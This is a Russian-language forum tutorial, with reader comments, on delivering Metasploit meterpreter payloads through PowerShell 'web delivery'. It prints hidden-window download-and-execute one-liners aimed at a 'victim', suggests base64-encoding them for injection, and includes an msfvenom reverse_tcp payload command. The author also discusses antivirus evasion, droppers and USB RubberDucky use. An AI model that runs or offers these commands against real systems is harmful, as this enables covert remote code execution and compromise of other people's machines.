Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 008
Часть 4
Предыдущая часть
Следующая часть
Все части

1461015_242885682542169_1621012423_n.jpg


Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я стараюсь в своих статьях придерживаться связки PowerShell+Metasploit. И в этой статье я также буду демонстрировать технику доставки полезной нагрузки для получение метерпретер сессии в метасплоите. И так давайте начнем.

Прежде чем начну,хочу заметить что мой скрипт Power_Meter,который я использовал в прошлых статьях так же работает по принципу веб деливери.

Для начала давайте посмотрим как это работает:
Запустим метасплоит,поищим по ключевому слову web_delivery

01.PNG


Посмотрим описания эксплойта:

02.PNG


Из описания узнаем для себя базовые опции,кем написан был еще в 2013 году и сплойт этот работает на платформах где есть или Python или PHP или PowerShell, ну мы же конечно посмотрим его на примере с PowerShell. Так же видим в описании что при запуске стартует простенький вебсервер который хранит на себе полезную нагрузку и генерирует команду для запуска этой полезной нагрузки в зависимости от языка программирования которые мы выберем командой set target
Ну что же , давайте зададим необходимые параметры и запустим наш эксплоит.

03.PNG


04.PNG


Как видим у нас поднялся простенький веб сервер с полезной нагрузкой по адресу
и выдал нам на вывод команду для подгрузки этой полезной нагрузки
powershell.exe -nop -w hidden -c $h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]:: DefaultCredentials;IEX $h.downloadstring('
Что же,для демонстрации просто запустим данную команду на стороне жертвы:

05.PNG


06.PNG


Как видим все тривиально просто) Команда подгрузила полезную нагрузку из удаленного веб сервера)
Круто)
Но зачем нам каждый раз поднимать веб сервер для хранение полезной нагрузки?
Давайте положим полезную нагрузку где то на .
Сперва сначала давайте скачаем содержимое нагрузки:

07.PNG


08.PNG


Скопируем содержимое полезной нагрузки и разместим где то на и сократим ссылку через :

09.PNG


10.PNG


Затем,мы уже поняли как работает принцип веб деливер используем следующую команду для компрометации жертвы:
powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring(' link removed

-w hidden (window hidden ) -- скрыть окно запуска
-NoP (No Profile) -- не использовать профиль PowerShell

IEX (New-Object Net.WebClient).downloadstring(' link removed -- загрузить и запустить в памяти контент который находится по ссылке
11.PNG
12.PNG


Как видим команда намного короче а результат тот же
Для удобства и инжекта в какое то ПО можно перегнать в base64 формат нашу команду)

14.PNG


15.PNG


16.PNG


Как видим результат тот же)
В общем на этом пока все) Надеюсь смысл техники доставки полезной нагрузки более менее понятен)

Если возникнут трудности - задавайте вопросы в комментариях - постараюсь ответить)


Всем спасибо) Если понравилась статья - жмакни лайк )

Предыдущая часть
Следующая часть
Все части
 
Последнее редактирование:
SooLFaa

SooLFaa

Администратор
15.07.2016
835
1 386
А если скомпилить файл hack поднять apache и положить в /var/www/apache2/ разве не тоже самое получится? Спасибо.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
835
1 386
Ну попробуй,потом скажешь ;)
Ты не понял вопрос. В чем принципиальное отличие этого подхода от того, что я положу тот же файлик hack на сервер и дам скачать пользователю? В конечном итоге все равно все сводится к тому, что пользователять должен скачать запустить файл. Сам же он не будет у себя писать powershell -скрипт. Проще говоря, что этот подход дает?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 008
Ты не понял вопрос. В чем принципиальное отличие этого подхода от того, что я положу тот же файлик hack на сервер и дам скачать пользователю? В конечном итоге все равно все сводится к тому, что пользователять должен скачать запустить файл. Сам же он не будет у себя писать powershell -скрипт. Проще говоря, что этот подход дает?
В первую очередь это техника доставки пейлоада ,которую я хотел раскрыть для читателей,на ней построенны много дроперов(например все мы прекрасно помним когда при установки ПО ,после установки у нас устанавливаеться еще куча ненужного гомна,типа браузер Амиго и т.д)
К тому же:
Бинарный файл,длл,и впрочем любой файл локальный - как минимум нужно упрятать от проверки различными АнтиВирусами(АВ),а эта техника позволит просто добавить строчку в какой то билд для получение метерпретера.
Еще , больше всего актуальность этой техники непосредственно для постексплуатации или закрепление в системе,например если у нас простенький шелл и нам нужно расширить функционал до метерпретора,мимикатца,повершел империи фреймворка...
В дальнейших постах я планирую показать как с помощью павершел запустить любой бинарый файл в памяти с пмощью этой техники и как можно обходить ав.
Так же одна строчка кода отлично подружется с RubberDucker и почти незаметно выполнится как только флешка вставится в разьем.
Еще пару постов и планирую переходить на PowerShell Empire Framework - знакомить читателей с его возможностями и функционалом. Но перед знакомством с фреймворком по моему мнению нужны такие посты ознакомительные как этот.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
835
1 386
В первую очередь это техника доставки пейлоада ,которую я хотел раскрыть для читателей,на ней построенны много дроперов(например все мы прекрасно помним когда при установки ПО ,после установки у нас устанавливаеться еще куча ненужного гомна,типа браузер Амиго и т.д)
К тому же:
Бинарный файл,длл,и впрочем любой файл локальный - как минимум нужно упрятать от проверки различными АнтиВирусами(АВ),а эта техника позволит просто добавить строчку в какой то билд для получение метерпретера.
Еще , больше всего актуальность этой техники непосредственно для постексплуатации или закрепление в системе,например если у нас простенький шелл и нам нужно расширить функционал до метерпретора,мимикатца,повершел империи фреймворка...
В дальнейших постах я планирую показать как с помощью павершел запустить любой бинарый файл в памяти с пмощью этой техники и как можно обходить ав.
Так же одна строчка кода отлично подружется с RubberDucker и почти незаметно выполнится как только флешка вставится в разьем.
Еще пару постов и планирую переходить на PowerShell Empire Framework - знакомить читателей с его возможностями и функционалом. Но перед знакомством с фреймворком по моему мнению нужны такие посты ознакомительные как этот.
Неее, про мощь самого powershell'а и на сколько он крутой я знаю и полностью согласен с тем, что это сильное и мощное оружие, которое творить может великие дела. Я говорю чисто о способе доставки, то есть по факту если я понял верно сплоит генерит строку powershell с которой мы потом можем делать че угодно но сие на нашей совести уже?
 
  • Нравится
Реакции: <~DarkNode~>
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 008
Неее, про мощь самого powershell'а и на сколько он крутой я знаю и полностью согласен с тем, что это сильное и мощное оружие, которое творить может великие дела. Я говорю чисто о способе доставки, то есть по факту если я понял верно сплоит генерит строку powershell с которой мы потом можем делать че угодно но сие на нашей совести уже?
Ну я просто показал как это работает на примере эксплойта из метасплойта. Суть вся в том что мы не скачиваем вредоносную полезную нагрузку локально а подгружаем удаленно в оперативную память. Это часто использутся для обхода АВ когда сигнатуры самого билда сильно детектятся АнтиВирусами.
Техника эта реализуется легко и другмим ЯП,просто серия постов посвященна именно павершел с точки зрения ИБ )
 
  • Нравится
Реакции: arm_n и Mixa
SooLFaa

SooLFaa

Администратор
15.07.2016
835
1 386
Ну я просто показал как это работает на примере эксплойта из метасплойта. Суть вся в том что мы не скачиваем вредоносную полезную нагрузку локально а подгружаем удаленно в оперативную память. Это часто использутся для обхода АВ когда сигнатуры самого билда сильно детектятся АнтиВирусами.
Техника эта реализуется легко и другмим ЯП,просто серия постов посвященна именно павершел с точки зрения ИБ )
Всё, до меня дошло, спасибо.
 
gushmazuko

gushmazuko

Red Team
24.03.2017
162
388
Не работает на Windows 10. Появляется надпись:
[*] 192.168.0.19 web_delivery - Delivering Payload
И дальше ничего не происходит. Кто знает в чем дело? Может из за win 10?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 008
Ч
Не работает на Windows 10. Появляется надпись:
192.168.0.19 web_delivery - Delivering Payload
И дальше ничего не происходит. Кто знает в чем дело? Может из за win 10?
Тестировал на вин10.Все хорошо работает.
 
gushmazuko

gushmazuko

Red Team
24.03.2017
162
388
Ч

Тестировал на вин10.Все хорошо работает.
Странно, на двух машинах с win 10 пробовал, не катит. Сегодня поменю еще kali, может сним проблема, я ставил metasploit pro.
И еще, сюдя по описанию он работает с x64, верно?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 008
Странно, на двух машинах с win 10 пробовал, не катит. Сегодня поменю еще kali, может сним проблема, я ставил metasploit pro.
И еще, сюдя по описанию он работает с x64, верно?
Суть техники в том,что сам код для поднятие сессии метерпретора размещен на удаленном ресурсе,а мы с машины жертвы его подгружаем и выполняем.
Техника работает на машинах с Windows ОС где есть установленный PowrrShell. У меня все работало как 32-х так и на 64-х битной Windows 10
 
gushmazuko

gushmazuko

Red Team
24.03.2017
162
388
Суть техники в том,что сам код для поднятие сессии метерпретора размещен на удаленном ресурсе,а мы с машины жертвы его подгружаем и выполняем.
Техника работает на машинах с Windows ОС где есть установленный PowrrShell. У меня все работало как 32-х так и на 64-х битной Windows 10
Посмотрел отчет Microsoft Essential, а там:
4531568.png

Как только его октлючил все заработало.
 
Последнее редактирование:
~localhost

~localhost

Well-known member
30.10.2017
169
49
Привет столкнулся с такой проблемой при использования данного экплойта,
Подскажите что делаю не так
Снимок экрана от 2018-06-11 10-45-16.png
предпологаю что ошибка кроется в web server, пытался скачать через браузер эту нагрузку, и моментально после вводу url в стороку, выскакивает данная ошибка, в браузере не чего не скачалось.
 
Последнее редактирование:
sosiskapi

sosiskapi

Well-known member
28.12.2016
61
22
Сперва сначала давайте скачаем содержимое нагрузки:
Подскажите как сгенерировать нагрузку, без поднятия сайта, так чтобы ее не пришлось скачивать, как в примере.
Пробовал так:
msf payload(windows/powershell_reverse_tcp) > generate
получил такое
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .......и т.д.
Это же не то?
И еще вопрос как сгенерировать powershell meterpreter В msfvenome?
 
Последнее редактирование:
gushmazuko

gushmazuko

Red Team
24.03.2017
162
388
Подскажите как сгенерировать нагрузку, без поднятия сайта, так чтобы ее не пришлось скачивать, как в примере.
Пробовал так:
msf payload(windows/powershell_reverse_tcp) > generate
получил такое
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .......и т.д.
Это же не то?
И еще вопрос как сгенерировать powershell meterpreter В msfvenome?
С msfvenom можно так сгенерировать:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=443 -f psh-cmd -o hack.ps1
потом размещаете этот файл где то на сервере если нужен Web-Delivery.
Но для генерации полезной нагрузки, лучше пользоваться -ом, он делает неплохую обфускацию.
 
  • Нравится
Реакции: sosiskapi
luzercod

luzercod

Active member
14.02.2019
25
1
фильтр сайта не даст доставить нагрузку
 
Мы в соцсетях: